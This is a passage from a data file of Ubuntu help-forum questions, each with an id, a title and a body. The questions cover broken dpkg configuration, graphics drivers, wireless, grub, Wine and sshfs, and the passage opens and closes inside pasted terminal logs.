configured yet . dpkg : error processing libevview2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evince : evince depends on libevdocument2 ( > = 2.29.5 ) ; however : package libevdocument2 is not configured yet . evince depends on libevview2 ( > = 2.29.5 ) no apport report written because maxreports is reached already ; however : package libevview2 is not configured yet . evince depends on libgtk2.0-0 ( > = 2.16.0 ) ; however : package libgtk2.0-0 is not configured yet . evince depends on shared-mime-info ; however : package shared-mime-info is not configured yet . dpkg : error processing evince ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gcalctool : gcalctool depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gcalctool ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgdict-1.0-6 : libgdict-1.0-6 depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgdict-1.0-6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-utils : gnome-utils depends on libgdict-1.0-6 ( > = 2.23.90 ) ; however : package libgdict-1.0-6 is not configured yet . gnome-utils depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gnome-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gtk2-engines-pixbuf : gtk2-engines-pixbuf depends on gtk2.0-binver-2.10.0 ; however : package gtk2.0-binver-2.10.0 is not installed . package libgtk2.0-0 which provides gtk2.0-binver-2.10.0 is not configured yet . gtk2-engines-pixbuf depends on libgtk2.0-0 ( = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gtk2-engines-pixbuf ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail18 : libgail18 depends on libgtk2.0-0 ( = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgail18 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk2.0-bin : libgtk2.0-bin depends on libgtk2.0-0 ( > = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgtk2.0-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of pidgin : pidgin depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing pidgin ( -- configure ) : dependency problems - leaving unconfigured setting up update-manager ( 1:0.134.11.1 ) ... dpkg : error processing update-manager ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-notifier : update-notifier depends on libgtk2.0-0 ( > = 2.14.0 ) ; however : package libgtk2.0-0 is not configured yet . update-notifier depends on update-manager ; however : package update-manager is not configured yet . dpkg : error processing update-notifier ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xulrunner-1.9.2 : xulrunner-1.9.2 depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing xulrunner-1.9.2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of icedtea6-plugin : icedtea6-plugin depends on xulrunner-1.9.2 ; however : package xulrunner-1.9.2 is not configured yet . icedtea6-plugin depends on libgtk2.0-0 ( > = 2.8.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing icedtea6-plugin ( -- configure ) : dependency problems - leaving unconfigured setting up libgweather-common ( 2.30.0-0ubuntu1.1 ) ... no apport report written because maxreports is reached already dpkg : error processing libgweather-common ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgweather1 : libgweather1 depends on libgtk2.0-0 ( > = 2.11.0 ) ; however : package libgtk2.0-0 is not configured yet . libgweather1 depends on libgweather-common ( > = 2.24.0 ) ; however : package libgweather-common is not configured yet . dpkg : error processing libgweather1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : shared-mime-info libgtk2.0-0 chromium-browser chromium-codecs-ffmpeg chromium-browser-l10n libevdocument2 libevview2 evince gcalctool libgdict-1.0-6 gnome-utils gtk2-engines-pixbuf libgail18 libgtk2.0-bin pidgin update-manager update-notifier xulrunner-1.9.2 icedtea6-plugin libgweather-common libgweather1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) administrator @ myserver : ~ $ thanks , avin
102485	lotus notes 8.5.3 applications not displaying correctly	when using custom lotus 8.5.3 applications on ubuntu 11.10 , i 'm finding that they do n't display correctly . the viewing pane is half white and half blue , however , notes appears to load other applications , such as mail , correctly . this seems to describe the issue that i 'm having on older version - https : //www-304.ibm.com/support/docview.wss ? uid=swg21409777 has anyone seen or fixed this issue ? i 'm using 32-bit ubuntu 11.10 , with notes 8.5.3 on a vm ( vmware player ) .
102487	ricoh aficio prints text instead of the cups print test page	i 'm trying to print to a ricoh aficio printer , my os is ubuntu 11.10 on a sony laptop . when i connect it it all seems ok , in the sense the printer appears on the printer list and is recognised as the correct model . however when i send a test page the folllowing occurs . instead of printing a test page it prints the following text : '' cups printtestpage '' not sure why this is happening ... any help would be much appreciated . best
102489	ati 5770 hd - its fan runs all time - how can i resolve this ?	i have another problem with my hd 5770 ati card . it 's fan all the time runs with the same speed ( i think it 's about 60 % cause i dont know how to measure it on ubuntu ) . i have installed the drivers following this method http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide even if i left my computer for three hours alone without any aplication runing , or watching video - every time it has the same speed . i have dual boot with windows 7 and there my graphic card fan is slow when i dont use pc and runs quicker if i start videos or games . how to solve this problem ? i read that i can set fan speed to custom value , for example 30 % , but how to make it to control automaticaly by the drivers . thanks . ( sorry for my english , im not from english speaking country and it 's hard for me to speak it )
102492	screen turns off while vlc is playing movies in kubuntu	when i play a movie on vlc the screen turns off after 10 minutes . i used to run ubuntu and this did n't happen there .
102493	best recommended partition size for 20gb hard disk ?	i have 20gb hdd , so which is the best recommended partition size for linux ?
102507	why does my panel become grainy and distorted after i unsuspend ?	i frequently suspend my computer and then bring it back , usually about twice a day . lately , when i bring it back , the panel at the top of the screen becomes distorted . here is a picture . logging out will fix the problem , although sometimes it goes away randomly . my launcher was also getting distorted , but it would fix itself as soon as i clicked something . the functionality is fine , it appears to just be cosmetic . is there a way i can fix this issue ?
102508	hybrid-dump for vdpau accelerated video playing on ubuntu 11.10 with bumblebee 3.0 ?	i am trying to run hybrid-dump for vdpau accelerated video playing on ubuntu 11.10 with bumblebee 3.0 installed and running . but following the instructions in the url below , i ca n't get mplayer with vdpau to work : http : //askubuntu.com/a/100812/17702 avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ git pull already up-to-date . avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ make clean & & make optirun true ld_library_path=/usr/lib/nvidia-current display=:8 metacity -- replace & ld_library_path=/usr/lib/nvidia-current display=:8 mplayer -vo vdpau file.720p.mkv # ( in the other gnome-terminal tab ) ld_library_path=/usr/lib/nvidia-current ~/hybrid_graphics/hybrid-windump/windump :8 :0 also tried : ld_library_path=/usr/lib/nvidia-current display=:8 mplayer -vo vdpau -vc ffh264vdpau file.720p.mkv i do n't get any video from it , only audio . i do get video and audio if i remove the vdpau bit , but then windump is not needed : ld_library_path=/usr/lib/nvidia-current display=:8 mplayer file.720p.mkv if i try glxspheres , it works well , like this : ld_library_path=/usr/lib/nvidia-current display=:8 glxspheres # ( in the other gnome-terminal tab ) ld_library_path=/usr/lib/nvidia-current ~/hybrid_graphics/hybrid-windump/windump :8 :0 polygons in scene : 62464 visual id of window : 0x27 context is direct opengl renderer : geforce 310m/pci/sse2 now video playing . following the instructions below , i got it to work to some extend : edit /etc/bumblebee/xorg.conf.nvidia and added : section `` screen '' identifier `` screen0 '' defaultdepth 24 subsection `` display '' depth 24 virtual 1280 720 endsubsection endsection restarted bumblebeed : sudo restart bumblebeed in one of the terminals , i call the mplayer command : ld_library_path=/usr/lib/nvidia-current : /usr/lib/nvidia-current/vdpau display=:8 optirun mplayer -vo vdpau -ao alsa file.720p.mkv in another terminal , i then call the compiz and then windump commands : ld_library_path=/usr/lib/nvidia-current display=:8 compiz -- replace & ~/hybrid-windump/windump :8 :0 problems : i am struggling with the size of the video window . in a 1366x768 screen , i set up for a 1280x720 video size , but the image is chopped by about 200 pixels on the right hand side , leaving the same size of black windump area . any ideas ?
102510	how can i get dejadup to only backup to ubuntuone ?	how can i get dejadup to only backup to ubuntuone ? i installed 11.10 on a small partition two weeks ago , setup for daily backups and forgot about it . next thing i know the disk was filled up and i did n't realize why . syncing can be nice but some things i want to push off my local disk space onto the cloud storage . like low-priority background backups . i also ca n't seem to find duplicity detailed settings like extensions to ignore , file size limit cutoff etc , though that 's a separate question .
102513	how to delete/move to trash a desktop shortcut as context menu move to trash is greyed	i got a desktop shortcut for `` network servers '' which launch a nautilus network window . i do n't know why this shortcut appeared in the first place . however i would like to get rid of it . right clicking on the shortcut shows that the option `` move to trash '' is greyed , highlighting a permission problem ? this option is greyed may be because i am not considered as root ( by default in ubuntu ) . however i do n't know where the file is and therefore ca n't change its permission . can i get rid of that shortcut in a terminal ? where is the file to remove ? can i tell ubuntu that i am root to allow the move to trash option in the context menu ? it looks like desktop shortcuts management is a hell in ubuntu 11.10 ...
102517	diagnosing frozen screen in ubuntu 11.10	i am a new user . i recently installed ubuntu 11.10 as a dual boot on a fairly standard dell dimension , 768 ram , intel 2 ghz chip . the first few times i ran it it was a bit slow , with a lot of flickering of the mouse cursor , but then it seemed to settle down . today , the screen has frozen . i was running firefox , gedit , and terminal . neither the mouse nor the keyboard seem to work , although i am not familiar with the control sequences i might use in ubuntu , such as ctrl alt del ( is there something like task manager on windows ? ) . could anyone please advise me on such control sequences , and if they fail , how i can find out what is causing the problem ?
102523	wireless is disabled	recently it 's repeated constantly ! ! network is disabled shown in the network icon , my os ubuntu 10.10 . while i 'm surfing on the net after a while ( may be 2 hours or may be a day ) it disconnect and then ca n't connect to wifi anymore till rebooting the machine ! ! . i 've searched and tried a lot of solutions but no useful one seems to solve the probelm : ( here is one in this forum it 's same problem explained there but ca n't solve as mentioned ! , also every thread/question related to the problem found here i tried but no hope . `` rfkill list all '' command shows : 1 : phy0 : wireless lan soft blocked : no hard blocked : yes even the wireless button is switched on ! another command : sudo ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill * '' lshw '' command : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 00:19 : db:3d : d1:18 width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical configuration : broadcast=yes driver=r8169 driverversion=2.3lk-napi ip=192.168.1.102 latency=0 multicast=yes resources : irq:43 ioport : d800 ( size=256 ) memory : fe2ff000-fe2fffff memory : fe2c0000-fe2dffff *-network:0 disabled description : wireless interface physical id : 1 bus info : usb @ 1:6 logical name : wlan0 serial : 00:19 : db:9d : d7 : c3 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=2.6.35-32-generic firmware=n/a multicast=yes wireless=ieee 802.11bg *-network:1 disabled description : ethernet interface physical id : 2 logical name : vboxnet0 serial : 0a:00:27:00:00:00 capabilities : ethernet physical configuration : broadcast=yes multicast=yes *of `` lspci '' command : 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) please help ... .any suggestion will be appreciated .
102527	how to open several terminal tabs in different folders ( working directories ) ?	i want one script to open several tabs in different folders . while searching i found this entry , but an exchange like seen below did open a terminal with three tabs in my home folder . the error message showed : failed to parse arguments : unknown option -- execute=cd /some/thing/ the script looks like this : # ! /bin/sh gnome-terminal -- tab -- execute= '' cd /some/thing/ '' \ -- tab -- execute= '' cd /home/ '' \ -- tab -- execute= '' cd /home/ '' \ exit 0 a variation with -- working-directory= '' /some/thing/ '' did also not help . can you see a mistake ?
102530	can i place the ubuntu one for windows home sync folder anywhere on c : \ during installation ?	my company does not allow us to keep personal files inside our personal folder . something about the roaming profiles getting to large . with dropbox i am able to set the destination of the folder during the install . is there anyway to tell ubuntu one where to put the ubuntu one folder ? i do n't want to add external folders to the sync list , i just want to control where the installer creates the ubuntu one folder . otherwise i ca n't use the service : (
102532	open application in specific desktop ( lxde )	how open application in specific desktop . for example : i use firefox , banshee , thunderbird . also i have a few desktops : ( 2 - named `` firefox '' , 4 - named `` mail '' , 5 - named `` music '' ) how to open each application in certain desktop ?
102536	what is kiosk type session ? how to have it ? how to use it ?	i recently heard about kiosk type session for ubuntu 11.10 , how do i use/install it ? what actually is it ?
102538	wine fonts problem	i installed sumatrapdf with wine and it works fine but i have problem about fonts . it shows english characters but does n't shows georgian . which font should i install to fix this problem ? see pictures : 1 ) english 2 ) georgian ( btw it shows change language window title in georgian )
102539	movie player to play unrared .rar files	i have a ubuntu server with transmission set up . i download most of my movies and series in .rar format . i have to unrar the movie and then look at it . do anyone know about a movie player who can play .rar files ? i know xbmc can , but xbmc is pretty resource heavy .
102544	help understanding command line	we are starting our jenkins ci with the following bash command that i would like understand . could someone explain what is doing ( the only bit i get is `` java -jar jenkins.war '' ) . thanks ! nohup java -jar jenkins.war > $ home/jenkins.log 2 > & 1 < /dev/null &
102553	my admin password is rejected	i am the administrator and original user of our 11.04 server with gui . ( my name , my password were all given when installing ) . but it frequently rejects my password ( and every other user 's password ) for running certain programs . for instance , i tried opening synaptic package manager . i was n't allowed to . i tried installing updates through update manager . it refused my password . in both cases , my name was not shown as the user . however after refusing my password 3 times , i tried update manager once again , and this time my name as user showed up , and my password was accepted . is this a bug ? am i doing something wrong ? it was asking for the root password , but by default root password is not set ( source : https : //help.ubuntu.com/community/rootsudo # re-disabling % 20your % 20root % 20account ) and my user password ( as admin ) should work . help ?
102555	is there any alternatives of tsocks support https proxy ?	tsocks is using ld_preload environment variable to inject into other applications . i can only access to internet via a https proxy , however tsocks only supports socks proxy . so is there any alternative support https proxy like proxifier for windows ?
102562	manually upload files from android	i ca n't find a way of uploading non-media or photo files from my android 2.2 phone to my u1 cloud . when i select `` upload file '' the choose a file option only allows media or photos . is there a way around this as i would really like to be able to sync ( manually upload ) modified files from my phone ?
102569	ca n't turn off syncing , option not seen in ubuntu one dashboard	i have read the ubuntu one tutorial and seen how there should be an option to not sync directories , but here is n't an option available on the directories in my ubuntu one dashboard . i need to turn off syncing in order to store data off my computer in ubuntu one .
102574	how is disk space shared from nodes when using ubuntu cloud ?	i 'm thinking about setting up a private cloud using ubuntu with 2 nodes , but i do n't quite understand how disk space from each node is handled in the cloud . can somebody explain how ( and if ) the disk space is accessible from within the cloud ? for instance when i have 2 nodes with varying amount of disk space , for example 320gb and 1tb , can i set up a `` shared storage '' from both devices ? edit for clarification : currently i have 3 windows servers , consisting of a domain controller , a database-/file-server and a web-/mail-server . i want to switch to an ubuntu server-based private cloud with vms serving these purposes instead of dedicating each physical server to a certain job . as my database- and web-server differ largely in their available disk space , i wondered whether i can manage the entire disk space from all nodes in the cloud and make it accessible similar to using dfs in windows ad to provide a network share that underlyingly uses two multiple servers . more generally what are common practices to share disk space within a cloud based infrastructure ? are there only key-/value-storages , or is something like the before mentioned scenario using network shares feasible ?
102583	issue with game display and controls	i bought a game off of the humble indie bundle 4 a few months ago called `` and yet it moves '' . it worked fine for ages , but then i stopped playing it . yesterday , i decided i wanted to play it a bit more , the game looked like it was going to start fine , the logos of the games producers faded in and out , the music started , but then i realized that the pause menu was n't showing up , and that the in-game cursor was n't moving at all . outside of the game , the cursor was moving fine and everything was working , just this game . i 'd rather not have to re-install it since i 'm quite a bit of the way through , and i 've searched the net but ca n't find anything . i am running ubuntu 11.10 on hpnc6400 laptop with intel integrated graphics .
102584	alt-tab completion while using ssh	i just recently discovered that pressing alt-tab on a console window allows me to autocomplete from the last commands and parameters i used . very useful ! but when using ssh from windows this feature is obviusly lost . is there a way to remap this function to another key ( s ) ?
102591	install grub , but not in the mbr	you may have become tired of the question i 'm about to ask , since i 've already found some posts concerning my issue . however , none of those seemed to work for me . so here 's the thing : my goal is to have dual-boot on my laptop ( hp elitebook 8540w ) , with the win-bootloader in the mbr . i already had win7 ultimate installed , along with the win-bootloader in the mbr . so now i 've installed ubuntu 11.10 on it 's own partition ( now i have the system-partition sda1 , the win-partition sda2 and the ubuntu-partition sda5 - do n't ask me why the enumeration turned out to be so weird . ) after not being able to install grub to a location other than the mbr ( it always ended with an error message and 'exit code 1 ' or something like that ) , i figured i could simply install it to the mbr , then remove it with the win-repair-tools , and then add an ubuntu-entry with easy-bcd to the win-bootloader . however , the last part does n't work ( even if i specify that easy-bcd can use its own copy of grub ) . so now i ended up with having ubuntu installed , without being able to boot into it . hence , i 'm desperately trying to somehow install grub on sda5 , so that i can finally create a valid , working entry for ubuntu in the win bootloader , but kind of failed miserably so far . i already tried 'install grub ' on the live cd ( something like grub-install /dev/sda5 ) , but it always returned an error message about not finding some specific files or folders ( i can try it again if you need this more detailed ) so now i 'd be very very grateful for some hints how i could finally make everything work as it should : ) cheers
102592	joysticks and gamepads in wine	i have an xbox 360 controller with the wireless-usb pickup and i 'm using the xboxdrv driver . the result is a joypad that all my native games ( that know about joysticks , eg super meat boy , shank , jamestown , xâ˛ , steel storm , etc ) can use . it 's awesome and would thoroughly recommend it . my problem is i have a few non-native games i play through wine . they seem to have no idea that the controller is there . i 'd guess that wine either does n't support it or just does n't do it automatically . so is there a way ? i 'd ideally like instructions specifically for the xbox controller if there 's any mapping required .
102595	is there a gnote lens for unity available ?	is anybody aware of a unity lens for gnote ? or does anybody know how to tweak the existing unity-lens-tomboy to scan the gnote folder instead of the tomboy folder ?
102596	mysql-server-5.1 installation gone wrong	i was installing mysql-server-5.1 on ubuntu and the installation was interrupted . this caused an error and now i ca n't remove the package or reinstall it . this is the console output : amatteo @ ubuntu : ~ $ sudo apt-get install mysql-server-5.1 reading package lists ... done building dependency tree reading state information ... done mysql-server-5.1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 38 not upgraded . 7 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up mysql-server-5.1 ( 5.1.49-1ubuntu8.1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing mysql-server-5.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up man-db ( 2.5.9-4 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up wamerican ( 6-3 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing wamerican ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up wbritish ( 6-3 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing wbritish ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of language-support-writing-en : language-support-writing-en depends on wamerican ; however : package wamerican is not configured yet . language-support-writing-en depends on wbritish ; however : package wbritish is not configured yet . dpkg : error processing language-support-writing-en ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up wspanish ( 1.0.25 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing wspanish ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of language-support-writing-es : language-support-writing-es depends on wspanish ; however : package wspanish is not configured yet . dpkg : error processing language-support-writing-es ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.1 man-db wamerican wbritish language-support-writing-en wspanish language-support-writing-es e : sub-process /usr/bin/dpkg returned an error code ( 1 ) at first it was just mysql-server-5.1 , but now it shows errors on every package i 've installed since then . any ideas ? thank you in advanced .
102598	empathy chat automatically closes when i open it	i started empathy from ubuntu terminal and the following warning occurred : folks-warning ** : error preparing persona store 'eds:1328683152.5139.1 @ developer-pc ' : could n't open address book ‘1328683152.5139.1 @ developer-pc’ : can not open book : could not create desktopcouchsession object segmentation fault what should i do ?
102606	stuck with 640x480 resolution using bumblebee on 10.04	i just installed bumblebee on a dell xps l502x . it basically works : optirun glxspheres does exactly what it should . however , x is running with a resolution of 640x480 . i can try to change settings with optirun nvidia-settings -c :8 ( as suggested on the bumblebee wiki ) , but in the relevant section it only lists resolutions up to 640x480 . in the /etc/bumblebee/xorg.conf . * files , there are no monitor or screen sections . adding them does n't change anything . how can i change the resolution ?
102608	key-based ssh login with nautilus ' `` connect to server ''	i tried loggin into an ssh server via nautilus ' `` connect to server '' feature by just leaving the password blank , but that did n't work . how do i connect to my server using the key i have on my system ?
102610	how do i get rid of wine drive ?	i had installed wine application then i removed it , but it still shows up when i do a virus scan . i want to know how to completely remove the wine drive .
102616	is it possible to pin programs to specific workspaces , without ccsm ?	i 'm running 11.10 . is there a way of setting certain applications to always open on a specified workspace ? i have noticed that most people suggest using compizconfig settings manager , but this can cause disastrous problems with unity . i found this identical question , but the only answer there was ccsm : is it possible to pin certain apps to a workspace in unity ? is there any way to do this without ccsm ? i have been searching for ages , but ca n't find an alternative . edit : devilspie partially works , but appears to have some limitations . i have a 2x2 workspace grid and can successfully get applications to start in workspace 1 or two , but trying 3 or 4 fails and the application loads in workspace 1 . this seems to be an issue with them being on a second row . i have found many others with the same issue , such as here : http : //www.linuxquestions.org/questions/linux-software-2/devilspie-and-compiz-viewports-on-multiple-rows-860619/ where the suggested answer was to use ccsm !
102619	is there a way to run the laptop only on ac power without removing the battery ?	is there a way possible to run a laptop only on ac power without having the need to remove the battery i.e . to disable the charging as it is possible in windows 7 .
102620	sshfs files from one server to another	i am trying to find the most secure way to transfer files from one server to another . i have the following architecture : currently i am using the main user salamis in order to mount the directories . the files in the original directory are created through a php file manager elfinder . unfortunately , i am not able to move , rename or delete any file from the mounted directory through php . i get permission denied . 1 ) is it because i mounted the filesystem using salamis instead of www-data ? 2 ) is it secure to mount the filesystem on server 2 as www-data ? if yes , how can i achieve that ? www-data does not have a password and i can not login using su -m www-data . i get authentication failure . 3 ) can you think of a better architecture ?
102622	how to get ubuntu server to act as a gateway	connecting to an ubuntu server using ethernet cables but no internet connection required to be configured is a dhcp server , with the server itself being the dhcp server and handing out the ips to each machine . also required is the instructions to set the ip of the ethernet card on the server statically in a manner which it can be used to communicate with other systems as the dhcp server and as a file server .
102623	ext4-fs : previous i/o error to superblock detected	i have installed ubuntu 11.10 on my usb hdd . the problem i am getting is this : ext4 ( sdb6 ) : previous i/o error to superblock detected buffer erronr on device sdb6 . logical block 0 i have been told to do fsck on this drive , which i did . only one bad sector was found and made `` unavailable '' . also , i am pretty sure this issue has nothing to do with bad sectors / blocks since the hdd is new and there has n't been any physical damage . what comes to my mind is that the issue could be on the line of 1 . `` spin down '' ( i just recently found out about this ) or 2. the kernel dropping the usb connection . any help and ideas on how to solve this problem would be greatly appreciated . -tyyr edit 1 : at this point , i am using indicator-cpu-freq set to performance ( as opposed to ondemand as before ) . it 's stable but still , not a true solution .
102624	best performance : gnome 3 , unity or cinnamon ?	which one of these three configurations consumes the least resources ?
102631	displaying output of arbitrary command on unity panel	in my current setup running ubuntu natty and gnome 2 , i use the compa applet to display information on my top gnome panel that i wish to always be visible on my desktop . i really like this ability to show exactly the information i want , through writing a python script that outputs something to stdout , and the having compa print this on my gnome panel , updating every x seconds . right now i have the current price of bitcoins up there , as well as the stock price of google . . you can see the plugin in question ( compa ) and the information it outputs in the middle of the top panel ( right click , `` open image in new tab '' for larger size ) . is there a way to achieve this in unity ? i want to have the information always visible , i should n't have to click anything to view the information .
102632	how can i install php 5.2 in 11.10 ?	i wish to install a `` legacy '' php application ( magento commerce 1.3 ) into a oneiric server . all the ppa 's i 've found hold packages for previous ubuntu versions . i 've tried to recompile php myself but the gd prerequisites are missing . the same question for 10.10 is answered here
102634	what is good software for editing raw photo files ?	i have a dslr ( canon 550d ) and since i 'm taking my first steps in the world of raw photography i do n't know which would be a good programme to use to edit these files . i 've tried digikam and gimp but was n't satisfied . i 'm sure there must be better software out there ...
102635	dell inspiron heating problem	i have a dell inspiron n5110 running on ubuntu 12.04 ( but this problem was the same on 11.10 and 11.04 i just hoped that 2 versions later it would resolve ) the temperature is at 78 deg celsius right now ( that with an external cooler on it ) and on my asus it 's at 58 with the exact same programs opened ( chrome and banshee ) . it can go as high as 90 and i ; m getting worried for the hardware my average load is 0.14 over 15 minutes so i ; m basically doing nothing on it and it fires up the heating issue is nonexistent on windows i updated my bios as i have read that might fix it but it didn't what would be the next step ?
102638	why do i have 32 ttys	i seem to have ttys0 all the way to ttys31 , the only real ( well virtual but at least they do someting ) serialports on my machine are ttyacm0 and rfcomm0 , what are all these ttys 's for ?
102640	how do i send a literal f6/etc . in byobu ?	in a byobu screen , i ssh'ed into another computer and launched byobu on that computer . now , i have byobu within byobu . how can i send byobu keystrokes ( f2 , f3 , f6 , etc ) to the inner byobu rather than the outer ? in other words , how do i escape or otherwise transmit these keys to the screen rather than having the outer byobu intercept them ?
102641	wireless driver fails to activate on an hp pavilion dv4 w/vista home premium	can i download a different wireless driver and put it on a thumb drive to install on my hp or run windows on the hp and connect to the internet and install to it and then reboot to ubuntu ? i 'm using my toshiba w/ubuntu to trouble shoot ? thank you . prob , solved , , using pinguy 12.04 , , running great off cd , , ,
102648	create additional workspaces in gnome-shell	i ca n't seem to create additional workspaces in gnome-shell . compiz says i should have four ( 2 by 2 ) but i only seem to have 2 set up . so , how do i create additional workspaces in gnome-shell ?
102651	memcached/apc will not start with php	i 've compiled php 5.3.9 and nginx 1.0.11 and want to use apc and memcached with php . i keep getting this error when attempting to load the apc/memcached modules : unknown ( 0 ) : warning - php startup : memcached : unable to initialize module module compiled with build id=api20090626 , nts php compiled with build id=api20090626 , nts , debug these options need to match i tried recompiling ( configure , make , make install ) php without the -- enable-debug option , but still no luck . any ideas on what i need to do to get these options to match ?
102657	can not switch between windows of the same application	i 'm using ubuntu 11.10 with unity . switching between applications ( alt + tab ) works , but switching between windows of one application ( alt + ' ) does n't . tried to assign alt + ' switching to another shortcut ( super + ' , ctrl + ' , alt + f1 , using system settings ) but nothing works . after install , everything was working fine . i have ' ( apostrophe ) instead of ` . to get that , i edited files in the /etc/x11/xkb/symbols . of course , if this matters . seems like there is a problem with assigning shortcuts using system settings . when i assign between windows of the same application to alt + tab , it still switches between different applications . no idea what 's going on . update : the problem is fixed . i 've been changing different settings of my keyboard , and one of the settings changed was xkbmodel . i set it to `` latitude '' ( thought it would fit better , that was really stupid ) . after i changed it back to `` pc104 '' , everything worked normally again . thanks everybody for your attention ! update 2 : the ` symbol still needs to be in it 's place for us layout . for russian i was able to leave ' assigned to `` tlde '' button . update 3 : seems like i have got the same problem with `` switch between windows of the same application immediately '' ( which is alt + esc by default ) . it does n't work , and assigning it to another shortcut does n't help . any suggestions ?
102663	how do i install with makefile ? i get erorr while typing `./configure`	i 'm trying to install intel driver from here : http : //intellinuxgraphics.org/2011q4.html however when running ./configure and then make i get the following output : $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to disable maintainer-specific portions of makefiles ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for gcc option to accept iso c99 ... -std=gnu99 checking how to run the c preprocessor ... gcc -std=gnu99 -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking whether __clang__ is declared ... no checking whether __intel_compiler is declared ... no checking whether __sunpro_c is declared ... no checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking for a sed that does not truncate output ... /bin/sed checking if gcc -std=gnu99 supports -werror=attributes ... no package xorg-macros was not found in the pkg-config search path . perhaps you should add the directory containing `xorg-macros.pc ' to the pkg_config_path environment variable no package 'xorg-macros ' found checking how to print strings ... printf checking for a sed that does not truncate output ... ( cached ) /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc -std=gnu99 ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to 